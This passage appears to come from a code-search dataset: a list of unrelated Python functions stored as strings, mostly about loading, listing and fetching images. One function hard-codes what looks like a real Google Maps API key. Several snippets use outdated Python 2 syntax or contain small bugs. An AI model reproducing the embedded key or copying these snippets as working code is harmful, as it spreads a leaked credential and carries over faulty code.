cursor.execute('SELECT b.image_name, b.X_Min, b.Y_Min, b.X_Max, b.Y_Max, '\n 'b.init_vector, b.goggles from BBOX AS b, IMAGE as i where '\n 'b.image_name=i.image_name and i.image_date=%s and b.goggles=False', current_date)\n\n for (image_name, x_min, y_min, x_max, y_max, init_vector, goggles) in cursor:\n metadata.append({'image_name': image_name,\n 'x_min': float(x_min),\n 'y_min': float(y_min),\n 'x_max': float(x_max),\n 'y_max': float(y_max),\n 'init_vector': init_vector\n })\n except Exception as e:\n print(e)\n\n with open(METADATA_FILE, 'w') as meta_file:\n json.dump(metadata, meta_file)\n return metadata", "def get_raw(self):\n \n return [i.get_metadata() for i in self.img_lst]", "def get_images(self):\n \n return self.img_lst", "def getSnapshots(self):\n snapshots = []\n for x in self.root.goto('CommonDataObjects/Attachments'):\n for y in x.getList():\n if y['name'] == 'Video Snapshot':\n self.f.seek(y['bidx'])\n blk = Block(self.f)\n sx = blk.goto('res_x').getLong()\n sy = blk.goto('res_y').getLong()\n raw = blk.goto(\"imagedata\").value\n data = zlib.decompress(raw)\n I = np.flipud(np.array(struct.unpack(\"<\" + str(3 * 
sx * sy) + \"B\", data)).reshape((sy, sx, 3)))\n snapshots.append(I)\n del blk\n return snapshots", "def __getitem__(self, idx):\n img_item = self.data['images'][idx]\n img_item_id = img_item['id']\n img_item_name = img_item['file_name']\n img_anno_list = [i for i in list(self.data['annotations'])\n if i['image_id'] == img_item_id]\n img_path = os.path.join(self.root, img_item_name)\n box = np.floor(np.array([i['bbox'] for i in img_anno_list]))\n category = np.array([i['category_id'] for i in img_anno_list])\n\n img = Image.open(img_path)\n results = self.transforms(img, box, category)\n img, box, category = results['img'], results['box'], results['category']\n\n return {\n 'img': img,\n 'box': box,\n 'category': category\n }", "def pic (self, list) : \n result = []\n for pmod in list :\n result.append (pmod.photo_uri)\n return result", "def get_entry_dict(self):\n\n # generating thumbnail URLs is slow, so only generate the ones\n # that will definitely be used.\n ret = {\n 'id': self.id,\n 'vertices': self.vertices,\n 'triangles': self.triangles,\n 'segments': self.segments,\n 'photo': self.photo.get_entry_dict(),\n }\n if self.dominant_rgb0:\n ret['dominant_rgb0'] = self.dominant_rgb0\n #if self.image_pbox:\n #ret['pbox'] = self.pbox\n #ret['image_pbox'] = {\n #'300': self.image_pbox_300.url,\n #'512': self.image_pbox_512.url,\n #'1024': self.image_pbox_1024.url,\n #'orig': self.image_pbox.url,\n #}\n if self.image_bbox:\n ret['image_bbox'] = {\n #'512': self.image_bbox_512.url,\n '1024': self.image_bbox_1024.url,\n #'orig': self.image_bbox.url,\n }\n return ret", "def get_images(self):\n return {'source': utils.image_from_tensor(self.source[0]),\n 'output': utils.image_from_tensor(self.output.data[0]),\n 'target': utils.image_from_tensor(self.target[0])}", "def create_observations_dict(instances, unprocessed_map_data):\n # print(instances)\n results = {}\n for idx in instances:\n results[idx] = {}\n if idx == instances[0]:\n tag_filter_pixel_corners = B.compute_corner_pixels(\n idx, unprocessed_map_data\n ).tolist()\n # prettified_corner_pixels = [tag_filter_pixel_corners[:2,0],tag_filter_pixel_corners[:2,1],tag_filter_pixel_corners[:2,2],tag_filter_pixel_corners[:2,3]]\n # results[idx][\"corner_pixels\"] = [pixel_pair.tolist() for pixel_pair in prettified_corner_pixels]\n results[idx][\"corner_pixels\"] = tag_filter_pixel_corners\n results[idx][\"tag_pose\"] = B.compute_tag_pose(\n idx, unprocessed_map_data\n ).tolist()\n results[idx][\"camera_pose\"] = B.compute_camera_pose(\n idx, unprocessed_map_data\n ).tolist()\n\n return results", "def get_iss_photos(lista,size=\"small\"):\n photos = []\n lista=asciitable.read(lista)\n lista=lista.ID\n pattern_s_L=[]\n pattern_b_L=[]\n link_L=[]\n idiss=[] \n for i in lista:\n pattern_s = \"http://eol.jsc.nasa.gov/DatabaseImages/ESC/%s/%s/%s-E-%s.JPG\" % (\n size,\n i[0:6],\n i[0:6],\n i[9:])\n pattern_b = \"http://eol.jsc.nasa.gov/DatabaseImages/ESC/%s/%s/%s-E-%s.JPG\" % (\n 'large',\n i[0:6],\n i[0:6],\n i[9:])\n link = \"http://eol.jsc.nasa.gov/SearchPhotos/photo.pl?mission=%s&roll=E&frame=%s\" % (\n i[0:6],\n i[9:])\n idISS = \"%s-E-%s\" % (\n i[0:6],\n i[9:])\n pattern_s_L.append(pattern_s)\n pattern_b_L.append(pattern_b)\n link_L.append(link)\n idiss.append(idISS)\n\n tmp = dict(link_small=pattern_s,\n link_big=pattern_b,\n link=link,\n idISS=idISS\n )\n\n photos.append(tmp)\n return photos,pattern_s_L,pattern_b_L,link_L,idiss", "def get_mapping_actions(image=None, imageId=None, in_digests=[], bundle={}):\n\n if not image or not bundle:\n 
raise Exception(\"input error\")\n\n if not verify_policy_bundle(bundle=bundle):\n raise Exception(\"input bundle does not conform to bundle schema\")\n\n ret = []\n \n image_infos = []\n\n image_info = anchore_utils.get_all_image_info(image)\n if image_info and image_info not in image_infos:\n image_infos.append(image_info)\n\n for m in bundle['mappings']:\n polname = m['policy_id']\n wlnames = m['whitelist_ids']\n\n for image_info in image_infos:\n #_logger.info(\"IMAGE INFO: \" + str(image_info))\n ii = {}\n ii.update(image_info)\n registry = ii.pop('registry', \"N/A\")\n repo = ii.pop('repo', \"N/A\")\n\n tags = []\n fulltag = ii.pop('fulltag', \"N/A\")\n if fulltag != 'N/A':\n tinfo = anchore_utils.parse_dockerimage_string(fulltag)\n if 'tag' in tinfo and tinfo['tag']:\n tag = tinfo['tag']\n\n for t in [image, fulltag]:\n tinfo = anchore_utils.parse_dockerimage_string(t)\n if 'tag' in tinfo and tinfo['tag'] and tinfo['tag'] not in tags:\n tags.append(tinfo['tag'])\n\n digest = ii.pop('digest', \"N/A\")\n digests = [digest]\n for d in image_info['digests']:\n dinfo = anchore_utils.parse_dockerimage_string(d)\n if 'digest' in dinfo and dinfo['digest']:\n digests.append(dinfo['digest'])\n \n p_ids = []\n p_names = []\n for p in bundle['policies']:\n p_ids.append(p['id'])\n p_names.append(p['name'])\n\n wl_ids = []\n wl_names = []\n for wl in bundle['whitelists']:\n wl_ids.append(wl['id'])\n wl_names.append(wl['name'])\n \n if polname not in p_ids:\n _logger.info(\"policy not in bundle: \" + str(polname))\n continue\n\n skip=False\n for wlname in wlnames:\n if wlname not in wl_ids:\n _logger.info(\"whitelist not in bundle\" + str(wlname))\n skip=True\n if skip:\n continue\n\n mname = m['name']\n mregistry = m['registry']\n mrepo = m['repository']\n if m['image']['type'] == 'tag':\n mtag = m['image']['value']\n mdigest = None\n mimageId = None\n elif m['image']['type'] == 'digest':\n mdigest = m['image']['value']\n mtag = None\n mimageId = None\n elif m['image']['type'] == 'id':\n mimageId = m['image']['value']\n mtag = None\n mdigest = None\n else:\n mtag = mdigest = mimageId = None\n\n if registry == mregistry or mregistry == '*':\n _logger.debug(\"checking mapping for image (\"+str(image_info)+\") match.\")\n\n if repo == mrepo or mrepo == '*':\n doit = False\n matchstring = mname + \": N/A\"\n if tag and (mtag == '*' or mtag == tag or mtag in tags):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mtag])\n doit = True\n elif digest and (mdigest == digest or mdigest in in_digests or mdigest in digests):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mdigest])\n doit = True\n elif imageId and (mimageId == imageId):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mimageId])\n doit = True\n\n matchstring = matchstring.encode('utf8')\n if doit:\n _logger.debug(\"match found for image (\"+str(matchstring)+\")\")\n\n wldata = []\n wldataset = set()\n for wlname in wlnames:\n wldataset = set(list(wldataset) + extract_whitelist_data(bundle, wlname))\n wldata = list(wldataset)\n\n poldata = extract_policy_data(bundle, polname)\n \n wlnames.sort()\n evalstr = ','.join([polname] + wlnames)\n evalhash = hashlib.md5(evalstr).hexdigest()\n ret.append( ( poldata, wldata, polname,wlnames, matchstring, m, evalhash) )\n return(ret)\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n\n return(ret)", "def images(self):\n return self._data[\"images\"]", 
"def photo_dict(phrase):\n switcher = {\n '병원 위치': 'https://maps.googleapis.com/maps/api/staticmap?center=37.507144,127.063737&zoom=16&size=640x480&markers=color:blue%7Clabel:S%7C37.507144,127.063737&key=AIzaSyCF-XXYf7IW1mkUZFeZF84BCcZdtC-z1M0',\n '병원 운영시간': 'http://gunn.pausd.org/sites/default/files/16-17-Bell-Schedule-Color---Compatible-Font.png',\n '프로모션 A': 'http://media.dontpayfull.com/media/deals/eurostar-promo-code.jpg',\n '프로모션 B': 'http://media.dontpayfull.com/media/deals/namebubbles-com-coupon-code.jpg',\n '프로모션 C': 'https://s-media-cache-ak0.pinimg.com/originals/79/79/31/79793174d230a27e9168bbccb33df62f.jpg',\n '의료진': 'https://s-media-cache-ak0.pinimg.com/736x/f4/89/ef/f489ef22363cf1e4c2a4fb5b1cd8aec5.jpg',\n '병원 사진': 'https://www.hpcimedia.com/images/website/ManChemNews/DIR_30/F_28071.jpg',\n '병원 진료과목': 'https://s-media-cache-ak0.pinimg.com/originals/d5/05/09/d505091a57d42d3ed1de8b6f9d906fdb.jpg'\n }\n default_url = 'http://autopartstoys.com/images/M127205243.jpg'\n return switcher.get(phrase, default_url)", "def get_images():\n return _IMAGES", "def __getitem__(self, index):\n\n #get the image name \n image_names = self.image_names[index]\n\n #make single name a list\n if(type(image_names) is not list):\n image_names = [image_names]\n\n image_target_list = []\n for image_name in image_names:\n\n #build the path to the image and annotation file\n #see format tab on Get Data page on AVD dataset website\n if image_name[0] == '0':\n scene_type = 'Home'\n else:\n scene_type = 'Office'\n scene_name = scene_type + \"_\" + image_name[1:4] + \"_\" + image_name[4]\n \n #read the image and bounding boxes for this image\n #(doesn't get the movement pointers) \n img = (Image.open(os.path.join(self.root,scene_name, \n images_dir,image_name)))\n with open(os.path.join(self.root,scene_name,annotation_filename)) as f:\n annotations = json.load(f)\n target = annotations[image_name]['bounding_boxes'] \n \n #apply target transform\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n #crop images for classification if flag is set\n if self.classification:\n img = np.asarray(img)\n images = []\n ids = []\n for box in target:\n cur_img = Image.fromarray(img[box[1]:box[3],\n box[0]:box[2],\n :])\n if self.transform is not None:\n cur_img = self.transform(cur_img)\n images.append(cur_img)\n ids.append(box[4])\n\n img = images\n target = ids\n \n #apply image transform \n if self.transform is not None:\n img = self.transform(img)\n\n image_target_list.append([img,target])\n\n #special case for single image/label\n if(len(image_target_list) == 1):\n image_target_list = image_target_list[0]\n\n return image_target_list", "def pictures(self):\n return self.container['pictures']", "def snapshots_created(self):\n # log.debug(\"Getting snaps created for volume {0}\".format(self.volume_id))\n snaps_info = []\n for snap in self._derived_snapshots:\n snap_info = {}\n try:\n if snap.volume_id == self.volume_id:\n snap.update()\n snap_info['snap_id'] = snap.id\n snap_info['snap_progress'] = snap.progress\n snap_info['snap_status'] = snap.status\n snap_info['snap_desc'] = snap.description\n snaps_info.append(snap_info)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n return snaps_info", "def article_images(id):\n try:\n query_string = '&artile_id='+str(id)\n logger.info('Calling the api' + APIURL + '/images/?format=json'+query_string)\n response = 
requests.get(APIURL + '/images/?format=json'+query_string)\n parser = json.loads(response.content)\n return parser\n except:\n logger.error('Calling the api error in article_images')\n raise Http404(\"Article image does not exist\")", "def get_data(self):\n return {\"imgID\": self.image_id}", "def write_images(deployment_key, image_data):\n\n for image_data_dict in image_data:\n\n print \"------------------>>> \" + image_data_dict['longitude']+\" \"+image_data_dict['latitude']\n\n #save the image\n image = Image(deployment_id=deployment_key,\n image_name=image_data_dict['image_name'],\n date_time=image_data_dict['date_time'],\n position=\"SRID=4326;POINT(\"+image_data_dict['longitude']+\" \"+image_data_dict['latitude']+\")\",\n #depth=image_data_dict['depth'],\n #depth_uncertainty=image_data_dict['depth_uncertainty'],\n )\n image.save()\n\n write_measurement(image, 'depth', 'm', image_data_dict['depth'])\n write_measurement(image, 'depth_uncertainty', 'm', image_data_dict['depth_uncertainty'])\n write_measurement(image, 'temperature', 'cel', image_data_dict['temperature'])\n write_measurement(image, 'salinity', 'psu', image_data_dict['salinity'])\n write_measurement(image, 'pitch', 'rad', image_data_dict['pitch'])\n write_measurement(image, 'roll', 'rad', image_data_dict['roll'])\n write_measurement(image, 'yaw', 'rad', image_data_dict['yaw'])\n write_measurement(image, 'altitude', 'm', image_data_dict['altitude'])\n\n #link the camera to the image\n camera_data_dict = read_camera_data(image_data_dict)\n camera = Camera(**camera_data_dict)\n camera.image = image\n camera.save()\n\n return None", "def view_images(request):\n user_root = request.session['user_root']\n search_id = request.session['search_id']\n with open(os.path.join(user_root, search_id, 'info.json')) as f:\n info = json.load(f)\n object_id_list = info['object_id_list']\n image_type_list = info['image_type_list']\n search_pattern = info['search_pattern']\n image_dir = scan_images(user_root, search_id, image_type_list,relative_path=True)\n\n # Add flag for conditional representation.\n flag_scan = False\n flag_classifier=info['flag_classifier']\n if search_pattern == \"scan\":\n flag_scan = True\n bounding_box_dict = scan_bb_images(\n user_root, search_id, folder_name=\"scans\")\n else:\n bounding_box_dict = scan_bb_images(user_root, search_id)\n\n return render(request, 'gallery.html',\n {\"object_id_list\": object_id_list,\n \"image_dir\": image_dir,\n \"bounding_box\": bounding_box_dict,\n \"flag_scan\": flag_scan,\n \"flag_classifier\":flag_classifier,\n \"image_type_list\":image_type_list})", "def acquire_images(cam, nodemap):\n #print(\"*** IMAGE ACQUISITION ***\\n\")\n try:\n result = True\n\n # Set acquisition mode to continuous\n \n\n # Begin acquiring images\n cam.BeginAcquisition()\n\n #print(\"Acquiring images...\")\n\n # Retrieve, convert, and save images\n \n\n try:\n # Retrieve next received image\n image_result = cam.GetNextImage()\n\n # Ensure image completion\n if image_result.IsIncomplete():\n print(\"Image incomplete with image status %d...\" % image_result.GetImageStatus())\n\n else:\n # Print image information; height and width recorded in pixels\n width = image_result.GetWidth()\n height = image_result.GetHeight()\n \n # Convert image to rgb 8 and append to list\n\n image_converted = image_result.Convert(PySpin.PixelFormat_BGR8, PySpin.HQ_LINEAR)\n \n \n\n # Release image\n image_result.Release()\n print(\"\")\n\n except PySpin.SpinnakerException as ex:\n print(\"Error: %s\" % ex)\n result = False\n\n # 
End acquisition\n cam.EndAcquisition()\n\n except PySpin.SpinnakerException as ex:\n print(\"Error: %s\" % ex)\n result = False\n\n return result, image_converted,width,height", "def _get_images(self):\n raw_outputs = self.interface.get_data(self.target_charge,\n self.charge_deviation,\n n_samples=self.n_samples)\n\n # apply roi to images\n roi_images = []\n for i in range(self.n_samples):\n roi_images += [apply_roi(raw_outputs['raw_images'][i], raw_outputs['ROI'])]\n\n # process and identify blobs in image\n min_size = 100\n outputs = {}\n for ele in self.output_keys:\n outputs[ele] = []\n\n for i in range(len(roi_images)):\n processed_image_data = image_processing.process_and_fit(roi_images[i],\n min_size)\n\n for ele in self.output_keys:\n if ele == 'image_check':\n outputs[ele] += [image_processing.check_image(processed_image_data['binary_image'],\n processed_image_data['smoothed_image'])]\n elif ele == 'processed_images':\n outputs[ele] += [processed_image_data['smoothed_image']]\n else:\n outputs[ele] += [processed_image_data[ele]]\n\n for ele in self.output_keys:\n outputs[ele] = np.array(outputs[ele])\n\n # add in raw data\n outputs.update(raw_outputs)\n\n # if we need to, get averaged results\n if self.average_measurements:\n avg_keys = ['rms_x', 'rms_y', 'CX', 'CY', 'n_blobs', 'FWHMX', 'FWHMY', 'centroid_offset']\n for key in avg_keys:\n outputs[key] = np.nanmean(outputs[key])\n\n return outputs", "def loadImagesTag(self): \n dictionary = {}\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(GENDER_FRONT)\n dictionary[\"gender\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIN_BACK)\n dictionary[\"skin\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(HEAD_BACK)\n dictionary[\"head\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(BODY_BACK)\n dictionary[\"body\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(MASK_BACK)\n dictionary[\"mask\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(HAIR_BACK)\n dictionary[\"hair\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n if self.avatarConfiguration[\"gender\"] == \"boy\":\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHIRT_BACK)\n dictionary[\"shirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(TROUSERS_BACK)\n dictionary[\"trousers\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIRT_BACK)\n dictionary[\"skirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n else:\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHIRT_DISABLED)\n dictionary[\"shirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(TROUSERS_DISABLED)\n dictionary[\"trousers\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIRT_BACK)\n dictionary[\"skirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHOES_BACK)\n dictionary[\"shoes\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n return dictionary", "def __getitem__(self, index):\n\n #get the 
image name and box\n #image_name,box_index = self.name_and_box_index[index]\n name_and_index = self.name_and_box_index[index]\n #name_and_index needs to be alist of lists\n if(len(name_and_index) >0 and type(name_and_index[0]) is not list): \n name_and_index = [name_and_index] \n \n image_target_list = []\n\n for image_name,box_index in name_and_index:\n #build the path to the image and annotation file\n #see format tab on Get Data page on AVD dataset website\n if image_name[0] == '0':\n scene_type = 'Home'\n else:\n scene_type = 'Office'\n scene_name = scene_type + \"_\" + image_name[1:4] + \"_\" + image_name[4]\n \n #read the image and bounding boxes for this image\n #(doesn't get the movement pointers) \n img = (Image.open(os.path.join(self.root,scene_name, \n images_dir,image_name)))\n with open(os.path.join(self.root,scene_name,annotation_filename)) as f:\n annotations = json.load(f)\n target = annotations[image_name]['bounding_boxes'] \n \n #apply target transform\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n #get the single box\n target = target[box_index]\n\n #crop images for classification if flag is set\n if self.classification:\n img = np.asarray(img)\n img = img[target[1]:target[3],target[0]:target[2],:]\n img = Image.fromarray(img)\n target = target[4] \n \n \n #apply image transform \n if self.transform is not None:\n img = self.transform(img)\n\n image_target_list.append([img,target])\n\n #special case for single image/label\n if(len(image_target_list) == 1):\n image_target_list = image_target_list[0]\n\n return image_target_list", "def get_image_urls(db_conn):\n rows = []\n\n with db_conn.cursor() as cur:\n cur.execute(\"select image_url from image_urls;\")\n for row in cur:\n print(row)\n rows.append({\n \"image_url\": row[0]\n })\n\n db_conn.commit()\n\n return rows", "def get_all_images(access_token):\n url = 'http://interview.agileengine.com/images'\n headers = {\n 'Authorization': 'Bearer ' + access_token\n }\n images = []\n try:\n logging.info(\"Fetching all the images\")\n response = requests.get(\n url,\n headers=headers\n )\n if response.ok: \n total_pages = response.json().get('pageCount')\n images = response.json().get('pictures')\n logging.info(f\"fetched 1 of {total_pages}\")\n for i in range(2,total_pages + 1):\n paginated_url = f'http://interview.agileengine.com/images?page={i}'\n response = requests.get(\n paginated_url,\n headers=headers\n )\n images += response.json().get('pictures')\n logging.info(f\"fetched {i} of {total_pages}\")\n \n detailed_images = []\n for image in images:\n detail_url = f\"http://interview.agileengine.com/images/{image.get('id')}\"\n \n logging.info(f\"Retrieving detail of {image['id']}\")\n response = requests.get(\n detail_url,\n headers=headers\n )\n if response.ok:\n detailed_images.append(response.json())\n return detailed_images\n except requests.exceptions.HTTPError:\n logging.exception('HTTP error')\n except requests.exceptions.ConnectionError:\n logging.exception('Connection error')\n except requests.exceptions.Timeout:\n logging.exception('Timeout error')\n except requests.exceptions.RequestException as e:\n logging.exception('Unexpected error')", "def index(self, req):\n params = {\n 'filters': self._get_filters(req),\n 'limit': self._get_limit(req),\n }\n\n if 'marker' in req.str_params:\n params['marker'] = self._get_marker(req)\n\n images = db_api.image_get_all_public(None, **params)\n\n results = []\n for image in images:\n result = {}\n for field in DISPLAY_FIELDS_IN_INDEX:\n 
result[field] = image[field]\n results.append(result)\n return dict(images=results)", "def image_display(start, end, user=None):\n if user != None:\n images = Image.objects.filter(submitter_id = user.id).order_by('-submission_date')[start:end]\n else:\n images = Image.objects.order_by('-submission_date')[start:end]\n rows = {}\n #Initialise lists\n for i in xrange(int(math.ceil(len(images)/3.0))): rows[i] = []\n #applies the lambda function to put each element into it's correct row\n map((lambda (idx, elem): rows[idx/3].append(elem)), enumerate(images))\n return rows", "def get_image_links(data):\n painting_links = []\n\n print(data)\n\n for painting in data:\n painting_links.append(painting['image'])\n\n return painting_links", "def get_images(self, ctx, page):\n is_imgur = 'source' in page.meta and page.meta['source'] == 'imgur'\n if 'type' in page.meta and page.meta['type'] == 'album':\n album = page.meta\n images = []\n if is_imgur:\n pp.pprint(page.meta)\n # bind to template via json\n images = self.get_imgur_album_images(page)\n self.albums[album['slug']] = images\n else:\n # get paths of all of the images in the album\n srcs = []\n # get absolute paths of images in album for each file type\n for file_type in FILE_TYPES:\n imgs = glob.glob(\n GALLERY_DIR + album['slug'] + '/*.' + file_type\n )\n\n for img in imgs:\n img_rel_path = (\n REL_GALLERY_DIR +\n album['slug'] + '/' + img.split('/')[-1]\n )\n srcs.append(img_rel_path)\n\n # split full srcs and thumb srcs from srcs into two lists\n images = []\n thumb_srcs = filter(\n lambda src: src.split('/')[-1].startswith(THUMB_PREFIX),\n srcs\n )\n for thumb_src in thumb_srcs:\n src = thumb_src.replace(THUMB_PREFIX, '')\n thumb_width, thumb_height = self.calc_img_hw(thumb_src)\n width, height = self.calc_img_hw(src)\n images.append({\n 'thumb_src': thumb_src,\n 'thumb_width': thumb_width,\n 'thumb_height': thumb_height,\n\n 'src': src,\n 'width': width,\n 'height': height,\n })\n self.albums[album['slug']] = images", "def make_image_dict(self):\n sprite_sheet = setup.GFX['treasurechest']\n image_dict = {'closed': self.get_image(0, 0, 32, 32, sprite_sheet),\n 'opened': self.get_image(32, 0, 32, 32, sprite_sheet)}\n\n return image_dict", "def index(self, req):\n context = req.environ['nova.context']\n filters = self._get_filters(req)\n images = self._image_service.index(context, filters=filters)\n images = common.limited(images, req)\n builder = self.get_builder(req).build\n return dict(images=[builder(image, detail=False) for image in images])", "def img_urls(self, media, type = \"low_resolution\"):\n\n imgs = {}\n\n for item in media:\n if item[\"type\"] != \"image\":\n continue\n\n imgs[item[\"id\"]] = item[\"images\"][type][\"url\"]\n\n return imgs", "def getOverlapComparisonImagesDict(self) :\n overlap_shift_comparisons = {}\n for o in self.overlaps :\n overlap_shift_comparisons[o.getShiftComparisonDetailTuple()]=o.getShiftComparisonImages()\n return overlap_shift_comparisons", "def default_image_list(self):\n for version in self.database.versions:\n release = self.database.latest_release(\n default.platform, version=version, architecture=default.architecture\n )\n\n if not release:\n continue\n\n image = self.database.get(\n version=version,\n platform=default.platform,\n release=release,\n architecture=default.architecture,\n )\n\n if not image:\n continue\n\n tags = [\n tag\n for tag in self.database.tags(image)\n if not any(\n (len(tag.version) == 4, tag.platform, tag.release, tag.architecture)\n )\n ]\n\n yield 
_format_image(image, tags)", "def filter_images(data, vgid2idx, meta_vgids):\r\n new_data = []\r\n for vgid in meta_vgids:\r\n new_data.append(data[vgid2idx[vgid]])\r\n return new_data", "def images(self, **kwargs):\n\n raise NotImplementedError", "def load_test_images(images):\n loaded = {}\n for description, _ in images.items():\n loaded[description] = load_from_netcdf(description)\n return loaded", "def read_image_data(self):\n\n for sequence_name in self.sequence_name_list:\n sequence = self.sequences[sequence_name]\n for image_id in sequence.image_id_list:\n sequence.image_dict[image_id].image_path = '{}{}/{}'.format(self.root_dir, self.name, sequence.image_dict[image_id].filename)", "def data_dict0():\n\n # 0- Sample from detectron2 -> 5 different sections.\n info_val0 = [{\"date_created\": \"2020-03-15 04:59:45.442988\",\n \"description\": \"Automatically generated COCO json file for Detectron2.\"}]\n images0 = [{\"id\": \"image\", \"width\": 100,\n \"height\": 100, \"file_name\": \"image.png\"}]\n annotations0 = [{\"id\": 1, \"image_id\": \"image\", \"bbox\": [70.0, 30.0, 30.0, 40.0],\n \"area\": 1200.0, \"iscrowd\": 0, \"category_id\": 0}]\n categories0 = [{\"id\": 0, \"name\": \"first\"}]\n licence0 = 'null'\n\n return [{\"info\": info_val0,\n \"images\": images0,\n \"annotations\": annotations0,\n \"categories\": categories0,\n \"licenses\": licence0}]", "def imageItems(self, context):\n prefs = getPreferences()\n\n images = [('NONE', \"––– Select –––\", \"\")]\n if prefs.path_value:\n for img in environmentImages(prefs.path_value):\n images.append((img, img, \"\"))\n\n return images", "def imageList(self):\n return self.__imageList", "def get_plates(cls, img_objs):\n # Make a copy of incoming image objects\n # Place holder for plate information\n img_objs['plate-detection'] = {}\n\n for original_image, crop_image in img_objs['cropped-images'].items():\n if crop_image != 0:\n\n # Obtain response from API\n information = cls.get_response(crop_image)\n\n if len(information) > 0:\n\n plate, prob, box = information[0], information[1], information[2]\n\n detection = {'path': crop_image,\n 'plate': plate,\n 'box': box,\n 'prob': prob\n }\n\n img_objs['plate-detection'][original_image] = detection\n else:\n\n print(' NO PLATES IN IMAGE {}'.format(crop_image))\n detection = {'path': crop_image,\n 'plate': 'NOPLATE',\n 'box': 0,\n 'prob': 0\n }\n img_objs['plate-detection'][original_image] = detection\n else:\n detection = {'path': original_image,\n 'plate': 'NOPLATE',\n 'box': 0,\n 'prob': 0\n }\n img_objs['plate-detection'][original_image] = detection\n\n return img_objs", "def get_images(self):\n \n images = []\n for order in self.order_lst:\n o_items = order.get_items()\n images.append(o_items.get_image())\n \n return images", "def get_image_urls_and_crop_metadatas(capture_keys):\n\n left_urls, crop_metadatas = [], []\n for capture_key in capture_keys:\n print(capture_key)\n\n # get image URLs\n left_image_key = capture_key.replace('capture.json', 'left_frame.resize_512_512.jpg')\n left_image_url = os.path.join('s3://', INBOUND_BUCKET, left_image_key)\n left_urls.append(left_image_url)\n\n # get crop metadata\n crop_key = capture_key.replace('capture.json', 'crops.json')\n\n try:\n s3.download_from_s3(INBOUND_BUCKET, crop_key, custom_location='/root/data/crops.json')\n crop_metadata = json.load(open('/root/data/crops.json'))\n\n anns = crop_metadata['annotations']\n if anns:\n left_image_anns = [ann for ann in anns if ann['image_id'] == 1]\n crop_metadatas.append(left_image_anns)\n 
else:\n crop_metadatas.append([])\n except ClientError as err:\n crop_metadatas.append([])\n\n return left_urls, crop_metadatas", "def iiif_info_json(images):\n return json.dumps([image[\"image\"].info() for image in images])", "def get_images(self):\n return self._get_brains(\"Image\")", "def list_images():\n image_map = build_image_map()\n click.echo('')\n click.echo('List of available images (Name - Description)')\n click.echo('')\n for name in image_map:\n click.echo('{} -> {}'.format(name, image_map[name]))", "def get_car_images(request):\n \n try:\n parsed_data = get_json_data(request)\n car = Car.objects.get(car_id=parsed_data[\"car_id\"])\n images = CarImage.objects.filter(car=car)\n image_path = []\n for image in images:\n image_path.append(ImageSerializer(image).serialize())\n ret = Response(SUCCESS, error_code[SUCCESS])\n ret.set_ret(\"data\", image_path)\n except ObjectDoesNotExist as e:\n ret = Response(NONEXIST_DATA, error_code[NONEXIST_DATA].format(e.message))\n except ValueError as e:\n ret = Response(INPUT_FORMAT, error_code[INPUT_FORMAT])\n except:\n ret = Response(UNKNOWN_ERROR, error_code[UNKNOWN_ERROR])\n return HttpResponse(ret.serialize(f))", "def clean(imagedata):\n\n if isinstance(imagedata, ndarray):\n imagedata = [imagedata]\n\n outdict = [array_to_im(im) for im in imagedata]\n\n return {'images': outdict}", "def get_image(self, pvname):\n if self.protocol == \"ca\":\n pvname = pvname.replace(\":ArrayData_RBV\", \"\")\n nx = self.get(f\"{pvname}:ArraySizeX_RBV\")\n ny = self.get(f\"{pvname}:ArraySizeY_RBV\")\n dw = self.get(f\"{pvname}:dw\")\n dh = self.get(f\"{pvname}:dh\")\n image = self.get(f\"{pvname}:ArrayData_RBV\")\n image = image.reshape(int(nx), int(ny))\n\n elif self.protocol == \"pva\":\n # context returns np array with WRITEABLE=False\n # copy to manipulate array below\n output = self.get(pvname)\n attrib = output.attrib\n dw = attrib[\"dw\"]\n dh = attrib[\"dh\"]\n nx, ny = output.shape\n image = copy.copy(output)\n\n return {\n \"image\": [image],\n \"x\": [-dw / 2],\n \"y\": [-dh / 2],\n \"dw\": [dw],\n \"dh\": [dh],\n }", "def read_images_file(deployment_path):\n image_data = []\n\n if os.path.isfile(os.path.join(deployment_path, images_filename)):\n with open(os.path.join(deployment_path, images_filename), 'rb') as csvfile:\n images_reader = csv.reader(x.replace('\\0', '') for x in csvfile)\n\n row_index = 2\n #skip the header rows (2)\n images_reader.next()\n images_reader.next()\n\n for row in images_reader:\n row_index = row_index + 1\n image_data_instance = dict(date_time=row[0],\n latitude=row[1],\n longitude=row[2],\n depth=row[3],\n image_name=row[4],\n camera_name=row[5],\n camera_angle=row[6],\n 